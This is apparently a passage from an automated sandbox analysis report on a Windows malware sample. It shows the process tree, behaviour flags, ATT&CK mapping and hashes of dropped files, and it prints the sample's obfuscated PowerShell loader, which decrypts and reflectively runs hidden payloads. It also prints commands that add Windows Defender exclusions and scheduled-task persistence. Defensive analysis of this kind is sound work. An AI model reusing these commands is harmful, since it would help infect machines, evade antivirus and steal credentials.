Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	3064	Hiplace.exe
Token: SeDebugPrivilege	2592	explorer.exe
Token: SeDebugPrivilege	2876	svchost.exe
Token: SeDebugPrivilege	2080	svchost.exe
Token: SeDebugPrivilege	2760	explorer.exe
Token: SeDebugPrivilege	2764	explorer.exe
Token: SeDebugPrivilege	2636	svchost.exe
Token: SeDebugPrivilege	2084	explorer.exe
Token: SeDebugPrivilege	2600	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Hiplace.exeexplorer.exesvchost.exe

pid process

3064 Hiplace.exe
2592 explorer.exe
2876 svchost.exe

pid	process
3064	Hiplace.exe
2592	explorer.exe
2876	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comcmd.exesvchost.comnet.exesvchost.comHiplace.exesvchost.comsvchost.com

description	pid	process	target process
PID 2848 wrote to memory of 2264	2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
PID 2848 wrote to memory of 2264	2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
PID 2848 wrote to memory of 2264	2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
PID 2848 wrote to memory of 2264	2848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
PID 2264 wrote to memory of 2556	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	cmd.exe
PID 2264 wrote to memory of 2556	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	cmd.exe
PID 2264 wrote to memory of 2556	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	cmd.exe
PID 2264 wrote to memory of 2788	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2788	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2788	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2788	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2576	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2576	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2576	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2576	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2788 wrote to memory of 3064	2788	svchost.com	Hiplace.exe
PID 2788 wrote to memory of 3064	2788	svchost.com	Hiplace.exe
PID 2788 wrote to memory of 3064	2788	svchost.com	Hiplace.exe
PID 2788 wrote to memory of 3064	2788	svchost.com	Hiplace.exe
PID 2576 wrote to memory of 2592	2576	svchost.com	explorer.exe
PID 2576 wrote to memory of 2592	2576	svchost.com	explorer.exe
PID 2576 wrote to memory of 2592	2576	svchost.com	explorer.exe
PID 2576 wrote to memory of 2592	2576	svchost.com	explorer.exe
PID 2264 wrote to memory of 2564	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2564	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2564	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2564	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2600	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2600	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2600	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2264 wrote to memory of 2600	2264	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 2556 wrote to memory of 2360	2556	cmd.exe	net.exe
PID 2556 wrote to memory of 2360	2556	cmd.exe	net.exe
PID 2556 wrote to memory of 2360	2556	cmd.exe	net.exe
PID 2564 wrote to memory of 2876	2564	svchost.com	svchost.exe
PID 2564 wrote to memory of 2876	2564	svchost.com	svchost.exe
PID 2564 wrote to memory of 2876	2564	svchost.com	svchost.exe
PID 2564 wrote to memory of 2876	2564	svchost.com	svchost.exe
PID 2360 wrote to memory of 2616	2360	net.exe	net1.exe
PID 2360 wrote to memory of 2616	2360	net.exe	net1.exe
PID 2360 wrote to memory of 2616	2360	net.exe	net1.exe
PID 2600 wrote to memory of 1384	2600	svchost.com	PORSCH~1.EXE
PID 2600 wrote to memory of 1384	2600	svchost.com	PORSCH~1.EXE
PID 2600 wrote to memory of 1384	2600	svchost.com	PORSCH~1.EXE
PID 2600 wrote to memory of 1384	2600	svchost.com	PORSCH~1.EXE
PID 2556 wrote to memory of 1732	2556	cmd.exe	powershell.exe
PID 2556 wrote to memory of 1732	2556	cmd.exe	powershell.exe
PID 2556 wrote to memory of 1732	2556	cmd.exe	powershell.exe
PID 3064 wrote to memory of 1944	3064	Hiplace.exe	svchost.com
PID 3064 wrote to memory of 1944	3064	Hiplace.exe	svchost.com
PID 3064 wrote to memory of 1944	3064	Hiplace.exe	svchost.com
PID 3064 wrote to memory of 1944	3064	Hiplace.exe	svchost.com
PID 1944 wrote to memory of 2396	1944	svchost.com	powershell.exe
PID 1944 wrote to memory of 2396	1944	svchost.com	powershell.exe
PID 1944 wrote to memory of 2396	1944	svchost.com	powershell.exe
PID 1944 wrote to memory of 2396	1944	svchost.com	powershell.exe
PID 3064 wrote to memory of 1964	3064	Hiplace.exe	svchost.com
PID 3064 wrote to memory of 1964	3064	Hiplace.exe	svchost.com
PID 3064 wrote to memory of 1964	3064	Hiplace.exe	svchost.com
PID 3064 wrote to memory of 1964	3064	Hiplace.exe	svchost.com
PID 1964 wrote to memory of 2980	1964	svchost.com	powershell.exe
PID 1964 wrote to memory of 2980	1964	svchost.com	powershell.exe
PID 1964 wrote to memory of 2980	1964	svchost.com	powershell.exe
PID 1964 wrote to memory of 2980	1964	svchost.com	powershell.exe

C:\Users\Admin\AppData\Local\Temp\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
"C:\Users\Admin\AppData\Local\Temp\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe"
1⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Users\Admin\AppData\Local\Temp\3582-490\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
  "C:\Users\Admin\AppData\Local\Temp\3582-490\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Roaming\Hiplace.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:2616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nPhjODIsI/WDcZybH65++xlcc22S7b9QC/h68k58u3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3wWdbJRvdn4KnLQIMJo8WA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tQGgt=New-Object System.IO.MemoryStream(,$param_var); $txwZc=New-Object System.IO.MemoryStream; $npUIY=New-Object System.IO.Compression.GZipStream($tQGgt, [IO.Compression.CompressionMode]::Decompress); $npUIY.CopyTo($txwZc); $npUIY.Dispose(); $tQGgt.Dispose(); $txwZc.Dispose(); $txwZc.ToArray();}function execute_function($param_var,$param2_var){ $dEZgT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $exMEB=$dEZgT.EntryPoint; $exMEB.Invoke($null, $param2_var);}$zeopl = 'C:\Users\Admin\AppData\Roaming\Hiplace.bat';$host.UI.RawUI.WindowTitle = $zeopl;$DxdHS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zeopl).Split([Environment]::NewLine);foreach ($kajrD in $DxdHS) { if ($kajrD.StartsWith(':: ')) { $eWkLV=$kajrD.Substring(3); break; }}$payloads_var=[string[]]$eWkLV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1732
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Hiplace.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Users\Admin\AppData\Roaming\Hiplace.exe
      C:\Users\Admin\AppData\Roaming\Hiplace.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3064
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Hiplace.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1944
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Hiplace.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Hiplace.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1964
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Hiplace.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\explorer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Users\Admin\AppData\Roaming\explorer.exe
      C:\Users\Admin\AppData\Roaming\explorer.exe
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2592
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2216
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:876
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2140
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1624
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3028
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2100
      - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn explorer /tr C:\Users\Admin\AppData\Local\Temp\explorer.exe
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1728
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2876
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2332
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1928
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2820
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2264
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1220
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2000
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2404
      - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn svchost /tr C:\Users\Admin\AppData\Roaming\svchost.exe
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1764
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\PORSCH~1.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Users\Admin\AppData\Roaming\PORSCH~1.EXE
      C:\Users\Admin\AppData\Roaming\PORSCH~1.EXE
      4⤵
      Executes dropped EXE
      PID:1384

C:\Windows\system32\taskeng.exe
taskeng.exe {B6912556-7A5B-413D-915B-B144BEDE959E} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
1⤵
PID:2700
- C:\Users\Admin\AppData\Local\Temp\explorer.exe
  C:\Users\Admin\AppData\Local\Temp\explorer.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2760
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Users\Admin\AppData\Local\Temp\explorer.exe
  C:\Users\Admin\AppData\Local\Temp\explorer.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2636
- C:\Users\Admin\AppData\Local\Temp\explorer.exe
  C:\Users\Admin\AppData\Local\Temp\explorer.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\ALLUSE~1\{90140~1\DW20.EXE

Filesize
859KB

MD5
02ee6a3424782531461fb2f10713d3c1

SHA1
b581a2c365d93ebb629e8363fd9f69afc673123f

SHA256
ead58c483cb20bcd57464f8a4929079539d634f469b213054bf737d227c026dc

SHA512
6c9272cb1b6bde3ee887e1463ab30ea76568cb1a285d11393337b78c4ad1c3b7e6ce47646a92ab6d70bff4b02ab9d699b84af9437b720e52dcd35579fe2693ec

Download Submit
C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

Filesize
547KB

MD5
cf6c595d3e5e9667667af096762fd9c4

SHA1
9bb44da8d7f6457099cb56e4f7d1026963dce7ce

SHA256
593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

SHA512
ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

Download Submit
C:\MSOCache\ALLUSE~1\{9A861~1\ose.exe

Filesize
186KB

MD5
58b58875a50a0d8b5e7be7d6ac685164

SHA1
1e0b89c1b2585c76e758e9141b846ed4477b0662

SHA256
2a0aa0763fdef9c38c5dd4d50703f0c7e27f4903c139804ec75e55f8388139ae

SHA512
d67214077162a105d01b11a8e207fab08b45b08fbfba0615a2ea146e1dd99eea35e4f02958a1754d3192292c00caf777f186f0a362e4b8b0da51fabbdb76375b

Download Submit
C:\MSOCache\ALLUSE~1\{9A861~1\setup.exe

Filesize
1.1MB

MD5
566ed4f62fdc96f175afedd811fa0370

SHA1
d4b47adc40e0d5a9391d3f6f2942d1889dd2a451

SHA256
e17cd94c08fc0e001a49f43a0801cea4625fb9aee211b6dfebebec446c21f460

SHA512
cdf8f508d396a1a0d2e0fc25f2ae46398b25039a0dafa0919737cc44e3e926ebae4c3aa26f1a3441511430f1a36241f8e61c515a5d9bd98ad4740d4d0f7b8db7

Download Submit
C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE

Filesize
285KB

MD5
831270ac3db358cdbef5535b0b3a44e6

SHA1
c0423685c09bbe465f6bb7f8672c936e768f05a3

SHA256
a8f78ac26c738b13564252f1048ca784bf152ef048b829d3d22650b7f62078f0

SHA512
f64a00977d4b6f8c43f53cee7bb450f3c8cbef08525975055fde5d8c515db32d2bfad92e99313b3a10a72a50dd09b4ffe28e9af4c148c6480622ba486776e450

Download Submit
C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE

Filesize
313KB

MD5
8c4f4eb73490ca2445d8577cf4bb3c81

SHA1
0f7d1914b7aeabdb1f1e4caedd344878f48be075

SHA256
85f7249bfac06b5ee9b20c7f520e3fdc905be7d64cfbefb7dcd82cd8d44686d5

SHA512
65453075c71016b06430246c1ee2876b7762a03112caf13cff4699b7b40487616c88a1160d31e86697083e2992e0dd88ebf1721679981077799187efaa0a1769

Download Submit
C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE

Filesize
610KB

MD5
41b87061bb3a2ffc31e3f74b3d575328

SHA1
579039f93ea8dd62986253f0d9f3ed3cc0e6deec

SHA256
3a36c66c1aa202ce5d2bdf617d4dae08774faf51ed51020391d06347c9f56b14

SHA512
54284e62251317d24cad368425786b0a63dbce8a978c1713ef00e1c0d78eea00d98b3c8a6acb9c868f326e4e331583282e402e5f829a3426f12ce49444e9268a

Download Submit
C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe

Filesize
381KB

MD5
3ec4922dbca2d07815cf28144193ded9

SHA1
75cda36469743fbc292da2684e76a26473f04a6d

SHA256
0587fd366ea7e94b3ae500874b1c5d684b5357fcc7389682d5a13c3301a28801

SHA512
956c3a1f2689cb72600edd2e90d652b77592a8a81d319dce026e88f6c02231af06aebd57d68460eb406de00c113522173423cb1b339a41a3918f379c7dc311f7

Download Submit
C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe

Filesize
137KB

MD5
e1833678885f02b5e3cf1b3953456557

SHA1
c197e763500002bc76a8d503933f1f6082a8507a

SHA256
